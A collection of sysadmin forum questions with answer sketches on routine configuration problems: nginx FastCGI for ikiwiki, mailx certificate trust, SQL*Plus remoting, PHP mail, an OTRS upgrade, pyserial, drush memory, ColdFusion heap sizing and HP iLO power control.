    - by meder
    My ultimate goal is to set up ikiwiki; my current goal is to get a FCGI wrapper working for nginx, so I can move on to the next step... The ikiwiki page points to this page as an example of a FCGI wrapper: http://technotes.1000lines.net/?p=23 So far I've installed the ikiwiki and libfcgi-perl modules through aptitude: aptitude install libfcgi-perl aptitude install ikiwiki It installed those packages as well as some minimal dependency packages. Following the technotes guide, I grabbed http://technotes.1000lines.net/fastcgi-wrapper.pl, but I'm not sure where to actually place this file... do I run it as a service? The script makes a socket file in /var/run/nginx, but that directory does not exist... do I create it manually? In addition to the .pl file for the CGI wrapper, I also need to define a separate CGI file for parameters. My conf looks like this: server { listen 80; server_name notes.domain.org; access_log /www/notes/public_html/notes.domain.org/log/access.log; error_log /www/notes/public_html/notes.domain.org/log/error.log; location / { root /www/notes/public_html/notes.domain.org/public/; index index.html; } } I don't have a cgi-bin directory, so where exactly should I create it within my structure? I'd obviously have to update the block below before including it in my conf, but I'm not exactly sure how this would work out. # /cgi-bin configuration location ~ ^/cgi-bin/.*\.cgi$ { gzip off; fastcgi_pass unix:/var/run/nginx/perl_cgi-dispatch.sock; fastcgi_param SCRIPT_FILENAME /www/blah.com$fastcgi_script_name; include fastcgi_params; } Also, since the user is www-data and /var/run is root-owned, what's the proper way of giving it access? Any tips appreciated.
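
    A hedged wiring-up sketch: the wrapper is a long-running daemon you start yourself (an init script is the tidy version), and the socket directory has to exist and be writable by the user the wrapper runs as before the first request arrives:

        # Create the socket directory the wrapper expects
        sudo mkdir -p /var/run/nginx
        sudo chown www-data:www-data /var/run/nginx

        # Run the wrapper as the web user (install path for the .pl is your choice)
        sudo -u www-data perl /usr/local/bin/fastcgi-wrapper.pl &

    The cgi-bin directory itself just needs to exist wherever SCRIPT_FILENAME points, with the .cgi files executable by www-data.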

  • smtp.gmail.com from bash gives "Error in certificate: Peer's certificate issuer is not recognized."

    - by ndasusers
    I needed my script to email the admin if there is a problem, and the company only uses Gmail. Following a few posts' instructions I was able to set up mailx using a .mailrc file. First there was the error about nss-config-dir; I solved that by copying some .db files from a Firefox directory to ./certs and pointing to it in .mailrc. A mail was sent. However, the error above came up. By some miracle, there was a Google certificate in the .db. It showed up with this command: ~]$ certutil -L -d certs Certificate Nickname Trust Attributes SSL,S/MIME,JAR/XPI GeoTrust SSL CA ,, VeriSign Class 3 Secure Server CA - G3 ,, Microsoft Internet Authority ,, VeriSign Class 3 Extended Validation SSL CA ,, Akamai Subordinate CA 3 ,, MSIT Machine Auth CA 2 ,, Google Internet Authority ,, Most likely, it can be ignored, because the mail worked anyway. Finally, after pulling some hair and many googles, I found out how to rid myself of the annoyance. First, export the existing certificate to an ASCII file: ~]$ certutil -L -n 'Google Internet Authority' -d certs -a > google.cert.asc Now re-import that file, and mark it as trusted for SSL certificates, like so: ~]$ certutil -A -t "C,," -n 'Google Internet Authority' -d certs -i google.cert.asc After this, listing shows it trusted: ~]$ certutil -L -d certs Certificate Nickname Trust Attributes SSL,S/MIME,JAR/XPI ... Google Internet Authority C,, And mailx sends out with no hitch. ~]$ /bin/mailx -A gmail -s "Whadda ya no" [email protected] ho ho ho EOT ~]$ I hope this is helpful to someone looking to be done with the error. Also, I am curious about some things. How could I get this certificate if it were not in the Mozilla database by chance? Is there, for instance, something like this? ~]$ certutil -A -t "C,," -n 'gmail.com' -d certs -i 'http://google.com/cert/this...'
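
    To the closing question: yes, roughly (a hedged sketch). openssl s_client can pull the live certificate chain straight from Google's SMTP endpoint, no browser database required, and certutil then imports the PEM as before (split the file first if more than one certificate comes back):

        # Fetch the chain from the server and keep the PEM blocks
        echo | openssl s_client -connect smtp.gmail.com:465 -showcerts 2>/dev/null \
            | sed -n '/BEGIN CERTIFICATE/,/END CERTIFICATE/p' > google-chain.pem

        # Import and trust it for SSL, as above
        certutil -A -t "C,," -n 'Google Internet Authority' -d certs -i google-chain.pem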

  • Executing Oracle SQLPlus in a Powershell Invoke-Command statement against a remote machine

    - by Scott Muc
    We have a basic PowerShell script that attempts to execute sqlplus.exe on a remote machine. The remote machine does not have the Oracle Instant Client installed, but we have bundled all the necessary DLLs in a remote folder. For example, we have sqlplus.exe and its dependencies in the directory C:\temp\oracle. If I navigate to that path on the remote server and execute sqlplus.exe, it runs just fine: I get the prompt for a username. If I go: Invoke-Command -comp remote.machine.host -ScriptBlock { C:\temp\oracle\sqlplus.exe } I get the following: Error 57 initializing SQL*Plus + CategoryInfo : NotSpecified: (Error 57 initializing SQL*Plus:String) [], RemoteException + FullyQualifiedErrorId : NativeCommandError Error loading message shared library Thinking that it's potentially a PATH issue, I tried the following: Invoke-Command -comp remote.machine.host -ScriptBlock { $env:ORACLE_HOME = "C:\temp\oracle"; $env:PATH = "$env:ORACLE_HOME"; C:\temp\oracle\sqlplus.exe } This had the same result. The error code is not very helpful and is extremely frustrating, since it does work when I log on to the machine. What is PowerShell remoting doing that's making this not work?
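
    A hedged sketch of a fuller invocation: "Error 57" together with "Error loading message shared library" usually means SQL*Plus cannot locate its message files (the sqlplus\mesg folder) under ORACLE_HOME in the remoting session, so set both variables inside the same script block and call the binary by explicit path (connection string and script path are placeholders):

        Invoke-Command -ComputerName remote.machine.host -ScriptBlock {
            $env:ORACLE_HOME = 'C:\temp\oracle'
            $env:PATH        = "$env:ORACLE_HOME;$env:PATH"
            & "$env:ORACLE_HOME\sqlplus.exe" -L -S 'user/pass@tnsalias' '@C:\temp\test.sql'
        }

    If that still fails, verify the bundle actually contains the sqlplus\mesg\*.msb files; without them Error 57 is expected no matter what the environment says.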

  • can't get php mail() working on Ubuntu desktop version with sendmail and postfix

    - by EricP
    I'm running an Ubuntu 9.10 LAMP stack and trying to do a simple email test with PHP, but no emails get sent: mail("[email protected]", "eric-linux test", "test") or die("can't send mail"); I get no errors from PHP when running that script. In my php.ini file I have: sendmail_path = /usr/lib/sendmail -t -i $ sudo ps aux | grep sendmail eric 2486 0.0 0.4 8368 2344 pts/0 T 14:52 0:00 sendmail -s “Hello world” [email protected] eric 8747 0.0 0.3 5692 1616 pts/2 T 16:18 0:00 sendmail eric 8749 0.0 0.3 5692 1636 pts/2 T 16:18 0:00 sendmail start eric 9190 0.0 0.3 5692 1636 pts/2 T 19:12 0:00 sendmail start eric 9192 0.0 0.3 5692 1616 pts/2 T 19:12 0:00 sendmail eric 9425 0.0 0.3 5692 1620 pts/1 T 19:37 0:00 sendmail eric 9427 0.0 0.3 6584 1636 pts/1 T 19:37 0:00 sendmail restart eric 9429 0.0 0.3 5692 1636 pts/1 T 19:38 0:00 /usr/lib/sendmail restart eric 9432 0.0 0.1 3040 804 pts/1 R+ 19:38 0:00 grep --color=auto sendmail When I run $ sendmail start it just hangs there doing nothing. I installed postfix as well to see if it would help, but it didn't. I tried connecting to port 25: eric@eric-linux:~$ telnet localhost 25 Trying ::1... Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 220 eric-linux ESMTP Postfix (Ubuntu) thanks
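
    Two hedged observations before touching PHP: every sendmail entry in that ps output is in state T (stopped, most likely suspended with Ctrl-Z; note also that the -s subject flag belongs to mailx, not sendmail), and on Ubuntu the postfix-provided binary lives at /usr/sbin/sendmail, so the sendmail_path in php.ini is worth verifying. Testing the pipeline without PHP isolates the failing layer:

        # Feed a message straight to the sendmail wrapper, the way PHP would
        # (the address is a placeholder)
        printf 'To: eric@example.com\nSubject: cli test\n\nhello\n' \
            | /usr/sbin/sendmail -t -i

        # Watch what postfix does with it
        tail -f /var/log/mail.log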

  • OTRS upgrade 3.0 to 3.1 fails

    - by Valentin0S
    Today I started upgrading OTRS from version 2.3 to 2.4, 2.4 to 3.0 and 3.0 to 3.1. Everything went smoothly except the upgrade from 3.0 to 3.1. OTRS provides a few Perl scripts which make the upgrade easier, and I used them for each upgrade step. The upgrade from 3.0 to 3.1 fails after running the upgrade script scripts/DBUpdate-to-3.1.pl. The error is: root@tickets:/opt/otrs# su - otrs $ scripts/DBUpdate-to-3.1.pl Migration started... Step 1 of 24: Refresh configuration cache... If you see warnings about 'Subroutine Load redefined', that's fine, no need to worry! Subroutine Load redefined at /opt/otrs/Kernel/Config/Files/ZZZAAuto.pm line 5. Subroutine Load redefined at /opt/otrs/Kernel/Config/Files/ZZZAuto.pm line 4. done. Step 2 of 24: Check framework version... done. Step 3 of 24: Creating DynamicField tables (if necessary)... done. DBD::mysql::db do failed: Cannot add or update a child row: a foreign key constraint fails (`pp_otrs`.`dynamic_field`, CONSTRAINT `FK_dynamic_field_create_by_id` FOREIGN KEY (`create_by`) REFERENCES `users` (`id`)) at /opt/otrs-3.1.10/Kernel/System/DB.pm line 478. ERROR: OTRS-DBUpdate-to-3.1-10 Perl: 5.14.2 OS: linux Time: Wed Sep 5 15:36:20 2012 Message: Cannot add or update a child row: a foreign key constraint fails (`pp_otrs`.`dynamic_field`, CONSTRAINT `FK_dynamic_field_create_by_id` FOREIGN KEY (`create_by`) REFERENCES `users` (`id`)), SQL: 'INSERT INTO dynamic_field (name, label, field_order, field_type, object_type, config, valid_id, create_time, create_by, change_time, change_by) VALUES (?, ?, ?, 'Text', 'Ticket', '--- {} ', 1, '2012-09-05 15:36:20' , 1, '2012-09-05 15:36:20' , 1)' Traceback (20405): Module: main::_DynamicFieldCreation (v1.85) Line: 466 Module: scripts/DBUpdate-to-3.1.pl (v1.85) Line: 95 Could not create new DynamicField TicketFreeKey1 at scripts/DBUpdate-to-3.1.pl line 477. Step 4 of 24: Create new dynamic fields for free fields (text, key, date)... $ Did anyone else face the same issue? Thanks in advance
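
    A hedged first diagnostic: the failing INSERT hard-codes create_by = 1, so the foreign key can only fail if the users table no longer has a row with id 1 (the initial root@localhost account, which some installations prune or renumber). Checking is quick:

        # Does user id 1 still exist? (credentials/database name as in Kernel/Config.pm)
        mysql -u otrs -p pp_otrs -e 'SELECT id, login FROM users WHERE id = 1;'

    If that returns nothing, restore an admin row with id 1 before re-running scripts/DBUpdate-to-3.1.pl.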

  • getting a pyserial not loaded error

    - by skinnyTOD
    I'm getting a "pyserial not loaded" error with the Python script fragment below (running OS X 10.7.4). I'm trying to run a Python app called Myro for controlling the Parallax Scribbler2 robot (figured it would be a fun way to learn a bit of Python), but I'm not getting out of the gate here. I've searched out all the Myro help docs, but like a lot of in-progress open source programs they are a moving target: conflicting, out of date, or not very specific about OS X. I have MacPorts installed and installed py27-serial without error. MacPorts lists the Python versions I have installed, along with the active version: Available versions for python: none python24 python25 python25-apple python26 python26-apple python27 python27-apple (active) python32 Perhaps stuff is getting installed in the wrong places or my PATH is wrong (I don't really know what I am doing in Terminal and have probably screwed something up). Trying to find out about my sys.path, here's what I get: import sys sys.path ['', '/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python27.zip', '/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7', '/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/plat-darwin', '/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/plat-mac', '/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/plat-mac/lib-scriptpackages', '/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python', '/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-tk', '/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-old', '/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload', '/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC', '/Library/Python/2.7/site-packages'] Is that a mess? Can I fix it? Anyway, thanks for reading this far. Here's the Python bit that is throwing the error; it occurs on the 'import serial' line. # Global variable robot, to set SerialPort() robot = None pythonVer = "?" rbString = None ptString = None statusText = None # Now, let's import things import urllib import tempfile import os, sys, time try: import serial except: print("WARNING: pyserial not loaded: can't upgrade!") sys.exit() try: input = raw_input # Python 2.x except: pass # Python 3 and better, input is defined try: from tkinter import * pythonver = "3" except: try: from Tkinter import * pythonver = "2" except: pythonver = "?"
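
    The sys.path output gives the game away (a hedged reading): the script is running Apple's system Python from /System/Library/..., while MacPorts installed py27-serial under /opt/local for its own python27. Either run Myro with the MacPorts interpreter or install pyserial for the system one:

        # Which interpreters are on PATH, and which ones can see pyserial?
        which -a python
        /opt/local/bin/python2.7 -c 'import serial; print serial.VERSION'
        /usr/bin/python -c 'import serial; print serial.VERSION'

        # Option A: run the app under the MacPorts python (script name is a placeholder)
        /opt/local/bin/python2.7 myro_app.py

        # Option B: give Apple's python its own copy
        sudo /usr/bin/easy_install pyserial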

  • PHP CLI not respecting memory limit in php.ini

    - by user13743
    I am using drush, which is a command-line PHP app to manage a Drupal website. I am running a command to import a lot of data, which is causing me to hit PHP's memory limit: PHP Fatal error: Allowed memory size of 536870912 bytes exhausted ... which is 512 MB if I'm doing the math correctly (536870912 / 1024 / 1024 = 512). I've changed the directive in the php.ini that drush uses: $> drush status ... PHP configuration : /etc/php5/cli/php.ini $> grep memory /etc/php5/cli/php.ini ; Maximum amount of memory a script may consume (128MB) ; http://php.net/memory-limit memory_limit = 1024M But I'm still hitting the 512 MB limit! I am running in a virtual machine, whose memory I changed from 512 to 1024 MB of RAM to allow drush to run. $> free -m total used free shared buffers cached Mem: 1010 578 431 0 14 392 -/+ buffers/cache: 172 837 Swap: 382 0 382 So it says it has some 431 MB free, now that I've bumped the VM up to 1024. I guess half the memory is being used to run the GUI, but I don't understand how the GUI was running okay when the VM had 512 MB of RAM. Why is the PHP CLI still hitting a 512 MB memory limit? If it was hitting a system memory limit, shouldn't it die around 431 MB, which is what the free command says is available?
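
    A hedged sketch for pinning down which limit is actually in force: the CLI may be reading a different ini than expected, and Drupal or drush can override memory_limit at runtime with ini_set(), which would explain a 512M ceiling that no ini file mentions:

        # What the bare CLI thinks, and which ini files it loaded
        php -r 'echo ini_get("memory_limit"), PHP_EOL;'
        php --ini

        # What PHP believes inside a bootstrapped Drupal site
        drush php-eval 'echo ini_get("memory_limit");'

        # Any runtime overrides hiding in the site or drush config?
        grep -rn memory_limit sites/default/settings.php ~/.drush 2>/dev/null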

  • Coldfusion on VPS, how much JVM heap memory?

    - by Steven Filipowicz
    Recently I got a VPS server running ColdFusion. The website was running fine until it got more and more traffic, and I started to encounter 'OutOfMemory' exceptions. I thought simply to raise the memory of the VPS server, but this didn't help. After doing some Google searches I found a setting in the CF Admin to set the JVM heap memory. It was at the standard Max Heap size of 512MB, with Min Heap size empty. After playing around a bit I have now set it to Min 50MB and Max 200MB; the good thing is that I'm not getting the 'OutOfMemory' exceptions anymore. So far so good! But with about 50 active visitors on the website, the website starts to get slow. CPU usage is only about 8% (Windows Task Manager), and the Task Manager also shows only about 30% of the 3GB RAM in use. So I'm thinking that my values could be tweaked to use more of the RAM. Honestly, I don't understand these JVM heap settings, so I have no clue what a good setting is for me. I found a CF script that displays the memory usage; the details are: Heap Memory Usage - Committed 194 MB Heap Memory Usage - Initial 50.0 MB Heap Memory Usage - Max 194 MB Heap Memory Usage - Used 163 MB JVM - Free Memory 31.2 MB JVM - Max Memory 194 MB JVM - Total Memory 194 MB JVM - Used Memory 163 MB Memory Pool - Code Cache - Used 13.0 MB Memory Pool - PS Eden Space - Used 6.75 MB Memory Pool - PS Old Gen - Used 155 MB Memory Pool - PS Perm Gen - Used 64.2 MB Memory Pool - PS Survivor Space - Used 1.07 MB Non-Heap Memory Usage - Committed 77.4 MB Non-Heap Memory Usage - Initial 18.3 MB Non-Heap Memory Usage - Max 240 MB Non-Heap Memory Usage - Used 77.2 MB Free Allocated Memory: 30mb Total Memory Allocated: 194mb Max Memory Available to JVM: 194mb % of Free Allocated Memory: 16% % of Available Memory Allocated: 100% My JVM arguments are: -server -Dsun.io.useCanonCaches=false -XX:MaxPermSize=192m -XX:+UseParallelGC - Dcoldfusion.rootDir={application.home}/../ -Dcoldfusion.libPath={application.home}/../lib Can I give the JVM more memory? If so, what settings should I use? Thanks very much!!
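
    For reference, the CF Administrator setting ultimately lands in jvm.config as -Xms/-Xmx flags, and that file can be edited directly (a hedged sketch; the path varies by ColdFusion version, and -Xmx must stay comfortably below physical RAM minus what the OS and web server need). Given 3 GB of RAM and the 100%-allocated, 84%-used heap shown above, something like this is a reasonable starting point:

        # {cf_root}/runtime/bin/jvm.config (or {cf_root}/bin/jvm.config on older versions)
        java.args=-server -Xms512m -Xmx1024m -XX:MaxPermSize=192m -XX:+UseParallelGC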

  • Remote RIB iLO on Proliant via RIBCL

    - by Wudang
    I'm trying to automate a process for our ops team. The process requires that some Windows servers running on blades are shut down, left down for a few hours, then restarted when some other processes complete. This is done by an op logging on to each blade's iLO web interface to stop and start it. I've been trying to automate this with HP's cpqlocfg program, with partial success. I can issue the GET_POWER, GET_USER_INFO, etc. commands, but SET_HOST_POWER fails in a specific way. Using the cpqlocfg GET_EVENTLOG command I can see the XML login event and the power command being issued from the iLO interface, but then nothing happens. Some hints from googling suggest ACPI isn't configured properly, but I can't find any hits on how to verify this. Am I even using the right command? There are also a few other options like PRESS_PWR_BUTTON etc. The problem is I have nowhere to test this; all I can do at the moment is give a script to ops and ask them to try it at 4am on a Sunday when they run the procedure. The shutdown is trivial, as I can use the Windows "shutdown" command; it's the power-on that I need help with. Anyone done this? I'd tag this "rib ribcl ilo" but lack the rep points, sorry.
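
    For comparison, a hedged sketch of the RIBCL payload that normally powers a host back on (credentials are placeholders; note the tag for the virtual power button is PRESS_PWR_BTN, worth trying as a fallback when SET_HOST_POWER is accepted but ignored, for instance when ACPI soft-off is not working on the host):

        <RIBCL VERSION="2.0">
          <LOGIN USER_LOGIN="adminname" PASSWORD="password">
            <SERVER_INFO MODE="write">
              <SET_HOST_POWER HOST_POWER="Yes"/>
            </SERVER_INFO>
          </LOGIN>
        </RIBCL>

    invoked with something like: cpqlocfg -s blade-ilo-hostname -f poweron.xml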
